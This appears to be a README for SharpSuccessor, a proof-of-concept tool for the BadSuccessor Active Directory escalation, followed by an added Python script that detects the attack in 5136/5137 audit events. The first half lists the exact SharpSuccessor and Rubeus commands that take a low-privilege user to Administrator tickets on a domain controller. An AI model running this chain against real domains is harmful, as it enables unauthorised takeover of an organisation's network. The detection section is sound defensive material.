SharpSuccessor is a .NET Proof of Concept (POC) for fully weaponizing Yuval Gordon's (@YuG0rd) BadSuccessor attack from Akamai. A low privilege user with CreateChild permissions over any Organizational Unit (OU) in the Active Directory domain can escalate privileges to domain administrator.
Use SharpSuccessor to add and weaponize the dMSA object, setting the account with access to the current user context:
SharpSuccessor.exe add /impersonate:Administrator /path:"ou=test,dc=lab,dc=lan" /account:jdoe /name:attacker_dMSA
Request a TGT as the current user context, in this case jdoe:
Rubeus.exe tgtdeleg /nowrap
Then use that TGT to impersonate the dMSA account:
Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIFTDCCB.....
Now you can request a service ticket with Administrator context for any SPN, including the Domain Controllers, for post-exploitation. For example, the following requests a ticket that grants Administrator privileges for SMB (cifs) on the domain controller:
Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIF2DCCBdS...
Now that we have the ticket in memory, we can test access:
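From the defender's side, the chain above leaves two distinct directory-audit footprints: a 5137 (object created) event for a new msDS-DelegatedManagedServiceAccount, followed by a 5136 (object modified) event that adds a value to msDS-ManagedAccountPrecededByLink, the attribute BadSuccessor relies on to make the dMSA inherit the superseded account's privileges. The script below is an added example, not part of SharpSuccessor, that runs that correlation over a handful of constructed Security-log events. It assumes the events have already been parsed into dicts carrying the standard 5136/5137 field names, and that object-level auditing (a SACL) is configured on the OUs so those events are generated at all.

```python
"""Detection helper for BadSuccessor-style dMSA abuse.

Added example, not SharpSuccessor code. Input is a list of Windows Security
events already parsed into dicts with the standard 5136/5137 field names.
"""
from dataclasses import dataclass

DMSA_CLASS = "msDS-DelegatedManagedServiceAccount"  # objectClass of a dMSA
LINK_ATTR = "msDS-ManagedAccountPrecededByLink"     # attribute abused by BadSuccessor
VALUE_ADDED = "%%14674"                              # 5136 OperationType meaning "value added"

# Constructed sample events mirroring the flow described on this page.
SAMPLE_EVENTS = [
    {"EventID": 5137, "SubjectUserName": "jdoe",
     "ObjectDN": "CN=attacker_dMSA,OU=test,DC=lab,DC=lan", "ObjectClass": DMSA_CLASS},
    {"EventID": 5136, "SubjectUserName": "jdoe",
     "ObjectDN": "CN=attacker_dMSA,OU=test,DC=lab,DC=lan", "ObjectClass": DMSA_CLASS,
     "AttributeLDAPDisplayName": LINK_ATTR, "OperationType": VALUE_ADDED,
     "AttributeValue": "CN=Administrator,CN=Users,DC=lab,DC=lan"},
    # Routine dMSA maintenance touching a different attribute: should not be rated high.
    {"EventID": 5136, "SubjectUserName": "svc-provision",
     "ObjectDN": "CN=web01_dMSA,OU=Servers,DC=lab,DC=lan", "ObjectClass": DMSA_CLASS,
     "AttributeLDAPDisplayName": "msDS-GroupMSAMembership", "OperationType": VALUE_ADDED,
     "AttributeValue": "<binary>"},
    {"EventID": 4624, "SubjectUserName": "jdoe"},  # unrelated noise
]


@dataclass
class Finding:
    severity: str
    object_dn: str
    actor: str
    reason: str


def analyze(events):
    """Return findings for dMSA creations and superseded-account links, in log order."""
    findings = []
    creators = {}  # ObjectDN -> SubjectUserName from the 5137 that created it
    for ev in events:
        eid = ev.get("EventID")
        dn = ev.get("ObjectDN", "")
        actor = ev.get("SubjectUserName", "?")
        if eid == 5137 and ev.get("ObjectClass") == DMSA_CLASS:
            creators[dn] = actor
            findings.append(Finding(
                "medium", dn, actor,
                "new dMSA object created; verify the creator is an authorised provisioning identity"))
        elif (eid == 5136
              and ev.get("AttributeLDAPDisplayName") == LINK_ATTR
              and ev.get("OperationType") == VALUE_ADDED):
            target = ev.get("AttributeValue", "?")
            reason = f"{LINK_ATTR} set to {target}; the dMSA will inherit that account's privileges"
            if creators.get(dn) == actor:
                reason += " (same principal created the object earlier in this log: matches the BadSuccessor chain)"
            findings.append(Finding("high", dn, actor, reason))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.severity.upper()}] {f.object_dn} by {f.actor}: {f.reason}")
```

Any 5136 that adds a value to msDS-ManagedAccountPrecededByLink is treated as high on its own, because in normal operation that attribute is only written during a deliberate account migration; the creation-by-the-same-principal correlation just strengthens the case. Feeding the function events from a SIEM export rather than the constructed list is the only change needed to use it on real data.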
Massive thanks to Jim Sykora and Garrett Foster for the inspirations and assistance for this tool!